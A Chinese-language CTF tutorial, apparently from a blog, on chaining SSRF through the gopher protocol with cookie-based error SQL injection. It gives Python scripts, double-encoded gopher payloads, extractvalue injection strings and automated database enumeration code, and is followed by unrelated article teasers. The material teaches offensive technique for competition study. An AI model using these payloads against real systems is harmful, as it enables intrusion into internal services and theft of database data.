当前位置: 首页 > article >正文

从一道CTF题出发,手把手教你用Gopher协议玩转SSRF+SQL注入(附Python脚本)

从零构建Gopher协议攻击链SSRF与SQL注入的深度实战指南当你第一次在CTF比赛中遇到SSRF漏洞时是否曾被Gopher协议的神秘面纱所困扰作为内网渗透中最强大的协议之一Gopher能够将SSRF的杀伤力提升到全新高度。本文将带你从协议原理到实战复现完整构建一条GopherSQL注入的攻击链。1. 环境侦察与漏洞定位任何成功的攻击都始于精准的信息收集。假设我们面对的是一个典型的CTF题目环境初步探测尝试基础输入如1和1测试注入点但发现没有明显回显源码审计查看页面源代码时发现隐藏的use.php端点协议识别访问该端点后确认存在SSRF漏洞专业选手往往会在源码注释、JS文件甚至错误信息中寻找隐藏端点这是CTF中的常见套路SSRF漏洞的核心价值在于它能绕过网络边界直接访问内网服务。以下是几种常见利用方式对比协议类型典型利用场景限制条件file://读取本地文件通常有路径限制dict://端口扫描和服务探测返回信息有限gopher://完整协议交互需要精确构造请求2. Gopher协议深度解析Gopher协议诞生于1991年虽然早已退出主流互联网舞台但在安全领域却焕发第二春。它的独特之处在于支持构造任意格式的网络请求能够封装HTTP、FTP等多种协议流量服务器端不会对请求头做严格校验一个典型的Gopher URL结构如下gopher://host:port/gopher-path_TCP数据流其中TCP数据流需要经过两次URL编码。来看一个实际的转换示例import urllib.parse original POST /index.php HTTP/1.1\r\n encoded urllib.parse.quote(urllib.parse.quote(original)) print(encoded) # 输出POST%2520/index.php%2520HTTP/1.1%250D%250A理解这个编码过程至关重要因为任何字符错误都会导致请求失败。常见需要特殊处理的字符包括空格 →%20→%2520回车换行 →%0D%0A→%250D%250A冒号 →%3A→%253A3. 构建初级攻击载荷让我们从最简单的身份认证绕过开始。假设我们发现目标使用基础的身份验证payload POST /login.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 25 unameadminpasswdadmin转换为Gopher格式的完整Python脚本from urllib.parse import quote def build_gopher_payload(data, host127.0.0.1, port80): encoded quote(quote(data)) return fgopher://{host}:{port}/_{encoded} http_request POST /login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 25 unameadminpasswdadmin print(build_gopher_payload(http_request))执行这个脚本后我们会得到一个完整的Gopher链接通过SSRF漏洞发送这个链接即可尝试登录。4. 发现并利用Cookie注入点在上一阶段成功获取到Cookie后我们发现响应头包含Set-Cookie: sessionYWRtaW4%3DBase64解码后得到admin这表明可能存在Cookie注入。我们构造报错注入载荷admin) and extractvalue(1, concat(0x7e, (select version),0x7e)) #对应的Python转换脚本sql_payload GET /index.php HTTP/1.1 Host: 127.0.0.1 Cookie: sessionYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoc2VsZWN0IEBAdmVyc2lvbiksMHg3ZSkpICM Connection: close print(build_gopher_payload(sql_payload))这个注入成功后会返回数据库版本信息确认注入点有效。接下来我们就可以进行更深入的数据探测。5. 自动化数据库枚举技术成熟的攻击者不会手动构造每个请求而是编写自动化脚本。以下是数据库枚举的完整流程获取当前数据库admin) and extractvalue(1, concat(0x7e, (select database()),0x7e)) #列出所有表table_payload GET /index.php HTTP/1.1 Host: 127.0.0.1 Cookie: sessionYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoU0VMRUNUIEdST1VQX0NPTkNBVCh0YWJsZV9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgV0hFUkUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkpLDB4N2UpKSAj Connection: close 提取表结构admin) and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_nameusers),0x7e)) #将这些步骤封装成自动化工具def enumerate_database(): steps { current_db: select database(), tables: SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase(), columns: SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table} } results {} for name, query in steps.items(): payload build_sql_payload(query) results[name] send_payload(payload) return results6. 高级注入技术与数据提取当遇到数据截断时可以使用substring或left/right函数分段获取def extract_large_data(query, chunk_size30): result for i in range(0, 1000, chunk_size): chunk_query fselect substr(({query}),{i},{chunk_size}) payload build_sql_payload(chunk_query) chunk send_payload(payload) if not chunk: break result chunk return result对于最后的flag提取典型的攻击链如下确定flag可能在的表和列检查数据长度select length(flag) from flag_table分段获取数据select right(left(flag,40),20) from flag_table组合最终结果完整的Python自动化脚本应该包含以下功能Gopher请求构造器SQL注入载荷生成器响应解析器错误处理机制结果可视化输出在真实CTF比赛中这种系统化的方法远比临时拼凑的脚本高效可靠。记住理解每个技术环节的原理比单纯获取flag更重要——因为下一道题目总会以新的变种出现。

相关文章:

从一道CTF题出发,手把手教你用Gopher协议玩转SSRF+SQL注入(附Python脚本)

从零构建Gopher协议攻击链:SSRF与SQL注入的深度实战指南 当你第一次在CTF比赛中遇到SSRF漏洞时,是否曾被Gopher协议的神秘面纱所困扰?作为内网渗透中最强大的协议之一,Gopher能够将SSRF的杀伤力提升到全新高度。本文将带你从协议原…...

终极指南:3步解决Calibre中文路径变拼音问题,让你的电子书库重获清晰命名

终极指南:3步解决Calibre中文路径变拼音问题,让你的电子书库重获清晰命名 【免费下载链接】calibre-do-not-translate-my-path Switch my calibre library from ascii path to plain Unicode path. 将我的书库从拼音目录切换至非纯英文(中文&…...

为Hermes Agent实现主动消息推送:非侵入式AI智能体扩展实践

1. 项目概述:为Hermes Agent注入“主动关怀”能力如果你正在使用Hermes Agent,可能会发现一个普遍现象:它非常强大,能处理复杂的对话、调用工具、管理任务,但它本质上是一个“被动响应”的智能体。只有当用户发起对话时…...

基于MCP协议的农业大宗商品气候风险AI情报引擎解析

1. 项目概述:一个为AI智能体打造的农业大宗商品气候风险情报引擎如果你在从事大宗商品交易、农业保险或供应链管理,那你一定对“信息差”和“信息滞后”这两个词深有感触。今天要聊的这个项目,apifyforge/agricultural-commodity-climate-mcp…...

为Gemini CLI打造AI开发全家桶:模块化配置提升编码效率

1. 项目概述:为你的Gemini CLI打造“全家桶”式开发环境 如果你和我一样,在日常开发中重度依赖AI助手,那你肯定对Claude和Gemini这类工具不陌生。但不知道你有没有遇到过这样的痛点:每次开启一个新项目,或者想用AI完成…...

手把手教你用STM32F103ZET6的SPI点亮2.4寸TFT屏(附ILI9341初始化代码避坑指南)

STM32F103ZET6 SPI驱动ILI9341 TFT屏实战全解析 第一次拿到2.4寸TFT屏时,看着五颜六色的排线,我完全不知道从何下手。屏幕背面印着"ILI9341"的型号标识,网上搜到的资料又零散不全。经过三天调试,当屏幕终于显示出清晰的…...

ChatGPT Anywhere:零成本集成ChatGPT的浏览器扩展开发框架

1. 项目概述与核心价值 最近在折腾浏览器扩展,发现一个挺有意思的开源项目,叫 ChatGPT Anywhere。简单来说,它提供了一个“骨架”,让你能直接在浏览器扩展里调用 ChatGPT,而且最关键的是,它不走 OpenAI 的官…...

MAA明日方舟助手:5分钟彻底告别重复刷图,全自动智能基建管理

MAA明日方舟助手:5分钟彻底告别重复刷图,全自动智能基建管理 【免费下载链接】MaaAssistantArknights 《明日方舟》小助手,全日常一键长草!| A one-click tool for the daily tasks of Arknights, supporting all clients. 项目…...

XLSX I/O:如何在C语言项目中高效处理Excel文件?

XLSX I/O:如何在C语言项目中高效处理Excel文件? 【免费下载链接】xlsxio XLSX I/O - C library for reading and writing .xlsx files 项目地址: https://gitcode.com/gh_mirrors/xl/xlsxio XLSX I/O是一个专为C语言开发者设计的轻量级Excel文件读…...

收藏!后端转AI应用开发必看:2026年机会与避坑指南

作者分享从8年Java后端转型AI应用开发的经历,指出2026年AI应用开发前景广阔,但需要复合型人才。文章强调后端工程能力在大模型应用开发中的重要性,建议后端开发者通过学习LangChain、RAG等技术转型,并提供详细的学习路径和面试技巧…...

LaTeX排版进阶:理解浮动体算法,让你的[htbp!]参数真正生效

LaTeX浮动体排版原理深度解析:从算法到实战调优 第一次用LaTeX排学术论文时,我被那些"不听话"的图表折磨得够呛——明明写了[h]参数,图片却总跑到下一页;精心设计的表格在PDF里突然"消失",翻了几页…...

Calibre中文路径插件:彻底解决电子书中文路径被拉丁化问题

Calibre中文路径插件:彻底解决电子书中文路径被拉丁化问题 【免费下载链接】calibre-do-not-translate-my-path Switch my calibre library from ascii path to plain Unicode path. 将我的书库从拼音目录切换至非纯英文(中文)命名 项目地址…...

Ryujinx:在PC上畅玩Switch游戏的终极模拟器解决方案

Ryujinx:在PC上畅玩Switch游戏的终极模拟器解决方案 【免费下载链接】Ryujinx 用 C# 编写的实验性 Nintendo Switch 模拟器 项目地址: https://gitcode.com/GitHub_Trending/ry/Ryujinx Ryujinx是一款用C#编写的开源Nintendo Switch模拟器,让你无…...

通用资源管理库resourcelib:统一抽象与声明式配置实践

1. 项目概述:一个被低估的通用资源管理库如果你在开发中经常需要处理各种“资源”——无论是本地的配置文件、远程的API密钥、数据库连接池,还是更抽象的线程池、内存缓存块——并且为它们的加载、验证、生命周期管理和统一访问而头疼,那么re…...

采购成本总是说不清?怎么打造让老板一眼看透的采购成本地图?

每100元营收中,就有超过60元经由采购之手花出去。 然而,辛辛苦苦一年,到了年底,采购最常听到的却是…… “钱到底花哪了?” “还能再降降吗?” 只有采购人员知道,各项费用成本明细分散在纸质合同…...

MAA:明日方舟终极自动化助手,一键解放你的双手![特殊字符]

MAA:明日方舟终极自动化助手,一键解放你的双手!🚀 【免费下载链接】MaaAssistantArknights 《明日方舟》小助手,全日常一键长草!| A one-click tool for the daily tasks of Arknights, supporting all cli…...

终极QQ空间历史说说备份指南:GetQzonehistory完整使用教程

终极QQ空间历史说说备份指南:GetQzonehistory完整使用教程 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 你是否担心QQ空间里那些珍贵的青春记忆会随着时间流逝而消失&…...

BEAST 2:如何用贝叶斯MCMC方法构建精确的进化树?

BEAST 2:如何用贝叶斯MCMC方法构建精确的进化树? 【免费下载链接】beast2 Bayesian Evolutionary Analysis by Sampling Trees 项目地址: https://gitcode.com/gh_mirrors/be/beast2 BEAST 2(Bayesian Evolutionary Analysis by Sampl…...

如何选择合适的防水卷材以应对不同项目需求?

在选择合适的防水卷材时,了解不同类型的材料及其特点十分重要。单面自粘和双面自粘防水卷材在使用上各有优劣,前者方便快捷,适合一般的施工需求,后者则提供更强的密封性,适用于更复杂的场所。车库顶板这种特殊区域则需…...

特朗普家族涉足AI,WorldRouter平台能否打破AI模型使用价格壁垒?

5月5日,与特朗普及其家族密切相关的加密货币公司WLFI,联合WorldClaw推出AI模型路由平台WorldRouter,可用加密货币结算模型token,还提供优惠。这会是一门好生意吗?平台亮点:功能丰富且价格诱人WorldRouter酷…...

【AISMM模型落地实战指南】:20年专家亲授技术生态建设的5大关键跃迁与避坑清单

更多请点击: https://intelliparadigm.com 第一章:AISMM模型与技术生态建设的底层逻辑 AISMM(Artificial Intelligence System Maturity Model)并非孤立的评估框架,而是以系统性、可演进性与协同性为内核的技术治理范…...

别再死记硬背了!用CAPL脚本在CANoe里实现这5个自动化测试场景,效率翻倍

别再死记硬背了!用CAPL脚本在CANoe里实现这5个自动化测试场景,效率翻倍 刚接触Vector工具链的工程师常陷入一个误区:把大量时间花在记忆CAPL函数语法上,却不知道如何将这些知识转化为实际测试能力。我曾见过团队成员反复查阅手册却…...

BitBake编译lighttpd时遇到‘Reconnecting to server’卡住?一个命令快速解决

BitBake编译lighttpd卡在"Reconnecting to server"的深度解析与系统化解决方案 在嵌入式开发领域,Yocto项目因其强大的定制能力和跨平台支持而广受欢迎。然而,当你在SDX62平台上使用BitBake编译lighttpd时,突然遇到"NOTE: Rec…...

告别裸机点阵:用LVGL V8.2给你的STM32 SPI屏做个炫酷Demo

从零打造STM32炫酷UI:LVGL V8.2在SPI屏幕上的实战指南 当你在STM32上成功驱动了那块SPI接口的LCD屏幕,看着它亮起并显示简单的图形时,兴奋之余是否也感到一丝不满足?裸机编程的点阵绘制方式,要做出一个滑动流畅的菜单或…...

VCS NLP低功耗仿真避坑指南:从UPF文件加载到Verdi Debug的完整实战

VCS NLP低功耗仿真避坑指南:从UPF文件加载到Verdi Debug的完整实战 在数字IC验证领域,低功耗仿真已成为不可或缺的一环。随着工艺节点不断演进,芯片功耗问题日益凸显,动态功耗管理变得至关重要。VCS NLP(Native Low Po…...

从“冒烟”实验到选型指南:搞懂电阻额定功率与二极管最大电流的实战意义

从“冒烟”实验到选型指南:搞懂电阻额定功率与二极管最大电流的实战意义 当一块电阻突然冒出白烟,或是二极管在电路中无声无息地失效,这背后往往隐藏着对元器件极限参数的误解。在嵌入式开发和硬件设计中,这些看似基础却致命的细节…...

WarcraftHelper:魔兽争霸3引擎现代化改造与帧率优化技术方案

WarcraftHelper:魔兽争霸3引擎现代化改造与帧率优化技术方案 【免费下载链接】WarcraftHelper Warcraft III Helper , support 1.20e, 1.24e, 1.26a, 1.27a, 1.27b 项目地址: https://gitcode.com/gh_mirrors/wa/WarcraftHelper 魔兽争霸3作为一款经典的即时…...

WordPress搬家换域名,后台进不去、样式全乱?宝塔面板下保姆级修复指南

WordPress域名更换全流程:宝塔面板下的零故障迁移方案 当你决定为WordPress站点更换域名时,可能没想到这个看似简单的操作会引发一系列连锁反应——后台突然无法登录、前端样式彻底崩溃、图片集体失踪。这不是技术故障,而是典型的域名迁移后遗…...

TranslucentTB完整教程:三步打造Windows任务栏个性化终极方案

TranslucentTB完整教程:三步打造Windows任务栏个性化终极方案 【免费下载链接】TranslucentTB A lightweight utility that makes the Windows taskbar translucent/transparent. 项目地址: https://gitcode.com/gh_mirrors/tr/TranslucentTB TranslucentTB是…...

终极键盘控制鼠标指南:用Mouseable彻底解放你的双手

终极键盘控制鼠标指南:用Mouseable彻底解放你的双手 【免费下载链接】mouseable Mouseable is intended to replace a mouse or trackpad. 项目地址: https://gitcode.com/gh_mirrors/mo/mouseable 你是否厌倦了在键盘和鼠标之间频繁切换?是否因长…...